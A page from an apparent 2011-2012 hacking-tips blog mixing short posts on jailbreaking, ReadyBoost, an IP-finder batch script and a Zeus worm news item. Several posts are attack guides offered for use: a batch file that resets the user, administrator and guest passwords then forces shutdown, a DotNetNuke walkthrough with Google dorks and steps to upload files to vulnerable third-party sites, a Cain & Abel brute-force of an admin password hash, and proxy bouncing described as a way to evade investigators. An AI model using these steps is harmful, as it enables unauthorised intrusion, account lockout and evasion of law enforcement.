Pages

Hack and Change Windows OS Password-Batch Program

3 comments

This trick based on Batch Programming by which your System shutdown and automatically change your System password by Batch Program password.This trick works both on Windows Xp and 7.

Type below write code line on "Notepad" .....


@echo off
break off
net user %USERNAME% pppp
net user administrator pppp
net user Guest pppp
shutdown -s -f -t 5
exit








Change Red Box write variable with your password which you want to change and In place of Blue Box  change with integer which after then completeion system ShutDown.

Work Very well,Enjoy it and HAPPY NEW YEAR 2012!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Make Your iPhone a Wi-Fi Hotspot-Part 2

0 comments

According to my promise i am come back with trick to change your iPhone as a Wi-Fi Hotspot. I found good response with first part.My second part is the last part of this trick and also totally complete.

For know about Jailbreak and it's installment read Make Your iPhone a Wi-Fi Hotspot-Part 1 .

For Jailbreak software Go Here


STEP A: First Install the Jailbreak in your iPhone and follow next steps.

STEP B:  Jailbroken phone is up and runing then launch the Cydia application store.

STEP C:  After launching the Cydia,Search for "MyWi",Here two apps listed,one says"No Rock" next to it never installed for us.Grab (Catch) the other one instead.

STEP D: Tap the install button and tap the confirm when installation complete then tap the "Reload Spring Board" button.

STEP E: Launch the MyWi apps and accept the agreement and Tap OK.After some time apps work and we got it working. It appeared as if the problem was with registering for a RockYourPhone account via the app.





STEP F: Instead of registering a account by apps,we go to RockYourPhone.com  and signed up.

STEP G: Re-launch MyWi. Tap "sign in." Paste in your email, type in your password. The app will check for your registration.


STEP H: you do get the app to launch, you'll see the option to turn Wi-Fi Tethering on via a toggle switch at the top. You can also turn on USB and Bluetooth tethering using the toggle towards the bottom. With tethering on, your phone's Internet connection, 3G or otherwise, is made available as a Wi-Fi hotspot to nearby computers. 


STEP I: When you're finished, you can switch tethering off and close the app.


STEP J: If problem come in sharing the 3G Data Connection,Go into the Settings app -> General -> Reset -> Reset Network Settings. Reboot the phone and try MyWi again.










Proxy Bouncing

1 comments

Proxy Bouncing is a trick by which a user connects to or bounce off several different proxy servers before connecting to the actual destination system.

This trick mostly used by the computer's criminals to blind the investigation agencies completely off their track.

By Proxy Bouncing,a bad guys are able to confuse the investigation agencies and get without caught.



USER------>Proxy 1----->Proxy 2----->Proxy 3------>
Proxy 4------>Final Destination

In Above diagram,you see a good view of Proxy Bouncing who help you think about Bouncing.

A large number of proxy servers are involved in a proxy bouncing  so it is impossible for the attacker to be traced.Some MultiProxy tool also change Proxy Server periodically.


Tool 1: Name: MultiProxy (For Windows OS) Click Here For Download

Tool 2: Name: Wingate (For Windows OS) Click Here For Download

Tool 3: Name: Squid (For Linux OS)  Mostly comes with popular Linux





If You Like My work so Follow my Blog.Thanks!!!!!!!

DotNetNuke Attacks-Hack Website

5 comments

Hello Friend,today i am going to explain a trick which are very simple in use.By this attacks you hack any website easily compare to any other attacks like SQL Injection and Cross Site Scripting.Like old technique which made by Microsoft same .Net also contain many vulnerability,So here we use this vulnerability for upload our image and file to any DotNetNuke vulnerable site.

So Lets go.

STEP 1: First open your Google Search Page and type below write Dork for found the vulnerable site..

inurl:tabid/1500/default.aspx

or

inurl:/portals/0 site:.com

Note::In place of .com you also use another domain in second Dork.

STEP 2:  Open the site and here you see URL address of site given as for example...

http://abcd.org/tabid/1500/Default.aspx

Change it into

http://abcdorg/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Means we add the below line in URL...

 Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

For example see below pic...




STEP 3: When you done STEP 2 then a new page come like below pic...





STEP 4: On this page choose 3rd option where write "A File On Your Site" see below pic...




STEP 5:  When STEP 4 complete then write in the URL,below write JavaScript code...

javascript:__doPostBack(‘ctlURL$cmdUpload’,’’)


For example see below pic...



STEP 6: When you done STEP 5 then a "BROWSE" option come like below pic...




Here click on the "Browse" option then a window open like below pic which open your system file for Upload.Here choose your TEXT or JPEG file for Upload.




STEP 7:  When you select file then a "Upload Select File" option come like below pic circle,click it.





STEP 7: Your file Upload Successfully.For see your upload file,write on the URL address..

www.sitename.domain-name/portals/0/your-file-name.file-extension


For example see below pic...



When you do it then your Upload file you see.



IF YOU LIKE THIS POST SO GIVEN YOUR COMMENT AND IF YOU LIKE MY WORK SO PLZ FOLLOW MY BLOG.THANKS!

Brute-Force Attacks

0 comments

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 

Here I am use this tool for hack the administrator account password of a system.For download this tool Click Here


After installation start your work .

STEP 1: Open the Cain & Abel and click on "Cracker" button like below pic...






STEP 2: After step 1 click on "LM & NTLM Hashes" like below pic circle...




STEP 3: After step 2 click on Adding Sign which shown in below pic...




STEP 4: A new window Pop-up like below pic,there click on "Next"...





STEP 5: After step 4 you found some account name like below pic in which my admin account "hrde" present.Right Click by mouse on the your admin account and go to step 6.




STEP 6: When you do right click of mouse you see below picture option...





Again click on the Brute-Force Attacks option you see below pic where you found "NTLM Hashes" click on it.




STEP 7: After done work of step 6 you see a window Pop-up like below pic and here click on "START" button.




When process done then you found the password like my system "12345" shown below...





Enjoy this trick and follow my blog if you like my blog work done.

Make Your Own IP Finder-Batch Programming

2 comments

ya program and make your own IP Finder software by use of batch Programming.Like below pic where in place of "Created by -HrDe(Hackarde)" write your name.





Type below program on notepad...


@title IP Finder - Created By HrDe(HACKARDE) & color F2
:Coding
@cls
@echo off & break off & @setlocal enabledelayedexpansion
@echo.
@echo ³³³³³³³³³³³³³³³³³ÉÍÍÍÍÍÍÍÍÍÍÍ»³³³³³³³³³³³³³³³³³
@echo ³³³³³³³³³³³³³³³³³º IP Finder º³³³³³³³³³³³³³³³³³
@echo ³³³³³³³³³³³³³³³³³ÈÍÍÍÍÍÍÍÍÍÍͼ³³³³³³³³³³³³³³³³³
@echo.


@set /p Website=Type Website URL Here :
@for /f "tokens=3" %%Z in ('ping %Website%^| find "["') do (
@for /f "tokens=* delims=" %%J in ("%%Z") do (
@set ip=%%J & @set ip=!ip:[=!
@set ip=!ip:]=! & @set ip_Website=!ip!
)
)
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo Website Address: %Website%
@echo IP Address: %ip_Website% & @echo. & @echo Press { ENTER } to continue...
@pause > nul
goto Coding


And save this notepad file with "ipfinder.bat"

And make your own software.

YouTube Launches YouTube For Schools & Educational Content

0 comments


YouTube Launches YouTube For Schools & Educational Content


YouTube Launches his Only Educational Content for Schools Student purpose who totally safe features. So join it...





For Go to Click Here

Make Christmas With Your Computer

0 comments

Make your Christmas with your computer system.I am given you a gift on this Christmas who given you a Snow Flow feelings on your PC screen like below pic...




For this only download this Software Click Here


When you open this software then without installation you see a window like below pic...





Here set your settings and make Christmas with your PC.

Make Your iPhone a Wi-Fi Hotspot-Part 1

1 comments

Jailbreak a application which come for iPhone and iPad and break the feature of Apple gadgets and by this you use application those never run on Apple device. So i think this is the best Hacking Tool for Apple gadgets.

In first part i am tell you how to use Jailbreak with your Apple iPhone and iPad,And in second part tell you how you make your iPhone a Wi-Fi Hotspot by use of JailBreak.

Before use it make your iPhone or iPad backup for only safety.


1. Verify you're running the latest version of iTunes (9.1.1). The iPad should be running OS 3.2.
Download the Spirit jailbreak for Mac or PC.

2. Connect the iPad, iPhone or iPod Touch to your computer using the USB cable.
Run the Spirit jailbreak application.

Windows users may need to run the program as an administrator -

Right-click on the .exe file and choose "Run as Administrator" from the menu.

If you still have issues, try running it in compatibility mode as well.

Right-click,
Go to Properties,
Compatibility tab,
Check the box "Run this program in compatibility mode for Windows version.

Watch below pic...






3. Click on "JailBreak" button like below pic...




4. The iPad will automatically reboot.

Once rebooted, you'll see the "Cydia" application installed on your iPhone/iPod Touch/iPad's desktop. From here, you have access to all the unapproved, third-party applications.

This is the last step of Install Jailbreak for you iPhone and iPad.Wait for second part i will be back in small time with Part 2.

Top 10 iPhone Security Tips-By McAfee

0 comments

Who love Mobile Gadgets always choose iPhone in his collection,without tell about iPhone,list of good Gadgets never complete.But also good feature of iPhone his security problem increase which remove by Apple time with time.

My today post help you remove the risk in security of iPhone and make it secure and too helpful for you.





Update Windows OS without Internet

5 comments

My today thread tell you how update all Windows Operating System without Internet connection.So follow my steps and done it successfully.

STEP 1: Go to Internet Cafe with your Pen Drive (PD) and Download AUTOPATCHER .After that Open it.

STEP 2: When you open the AUTO PATCHER it look like below pic.Here choose your version of OS you want update and click on next.




STEP 3: When you click next then it start download update like below pic...





STEP 4: After downloading then insert your PD in System and copy all the Download in your PD.

STEP 5: Come Home and Insert your PD in your system and Update your system successfully.


New Facebook Worm installing Zeus Bot in your Computer

0 comments

Today another new attack on Facebook users with Zeus Bot comes in action. The researchers of Danish security firm CSIS, has spotted a worm spreading within the Facebook platform. A new worm has popped up on Facebook, using apparently stolen user credentials to log in to victims' accounts and then send out malicious links to their friends. The worm also downloads and installs a variety of malware on users' machines, including a variant of the Zeus bot.






If followed, the link takes the potential victim to a page where he or she are offered what appears to be a screensaver for download. Unfortunately, it is not a JPG file, but an executable (b.exe). Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems. The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare.

Zeus is a common tool in the arsenal of many attackers these days, and is used in a wide variety of attacks and campaigns now. It used to be somewhat less common, but the appearance of cracked versions of the Zeus code has made it somewhat easier for lower-level attackers to get their hands on the malware. Zeus has a range of capabilities, and specializes in stealing sensitive user data such as banking credendtials, from infected machines.

"The worm carries a cocktail of malware onto your machine, including a Zbot/ZeuS variant which is a serious threat and stealing sensitive information from the infected machine," warn the researchers.The worm is hosted on a variety of domains, so the link in the malicious message may vary. Other servers are used to collect the data sent by the aforementioned malware and to serve additional malicious software.






This type of thing is very rare to just send to your email without you requesting it so I would advise anyone who thinks that you may have seen an email like this to delete it and mark it as spam right away.

Source: The Hacker News

Change WebPage into PDF

1 comments

Too interesting Headline,My this trick help you change a Web Page into a PDF File very easily only by use of Gmail,ya this trick done by Gmail.

First Go to your Gmail account and Click on "COMPOSE" tab for write the Email like below given picture and in "To" write

submit@web2pdfconvert.com


Like below picture and in "Subject" and in "Message" type the Full Website address in my case i am write my blog name,watch below pic and after that "Send" it.





Wait For 5 to 10 Minute then you found a message in "INBOX" open it,this Email look like below pic...




Click on "VIEW" or "Download" option then you see PDF file of my blog like below pic...





Try it with different Website and given your good reply in comment Box.

If you like my work So plz Follow it.

Use Your Pen Drive as RAM

3 comments

Today i am tell about a trick by which you use your Pen Drive as a RAM and increase your system RAM successfully. Two different trick for different version of Windows. My first trick for Windows Vista and 7 and second trick for Windows Xp and below version.

So let's start.

TRICK 1:

This trick work for Windows 7 and Vista by which you use your Pen Drive as a RAM(Random Access Memory).

1. Insert your Pen Drive in system and go to property of Pen Drive by Right Click of Mouse.

2. Property Window open like below pic. Here click on "ReadyBoost Tab" and then you see radio button in which write "Dedicate this device to ReadyBoost". I am show it red color box in below pic...



3. Set your MB memory according to your requirement,and Press OK. All important work show in above picture.

TRICK 2:

This trick work in Windows Xp and below version but here i am use a Software which name is "ebooster" by which you change your Pen Drive space into RAM.

For Download Software Click HERE

1. When you download this software then you found a WinRAR file then extract it and Install software.

2. After Installation go to START and open "ebooster" then you see window like given below pic...



3. First select your Pen Drive in "Select Memory" option and then set require memory in MB then press OK.


I think it very helpful for you if you want use HARD DRIVE as a RAM then READ my old post...


If you like my work so plz follow my blog.

Find and Remove Carrier IQ from your Android Device

1 comments

We are use Carrier IQ for performance monitoring of the Smartphones means it is a service software by which your Smartphone secure but some researcher think it might be Key-logger or root kit by which your smartphone may be under risk.

Carrier IQ makes a new software that may be looging your every move of your Smartphone.

So if you want to check or if want this Keylogger removes from your Android Device then you can use LOGGING CHECKER developed by Trevor Eckhart.

This application help you to check logging activity which going in your mobile and also know where the logging data is going to.





This is a key for unlocking pro cleanup and removal features of logging test application.This is ONLY a license file, and must be installed after the main application is. Root is required because it will also install proper binaries required to system if they dont exist. You may uninistall this app completely 15 minutes after you activate your license.


Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

Loading
 
HACKARDE © 2011 | Designed by HrDe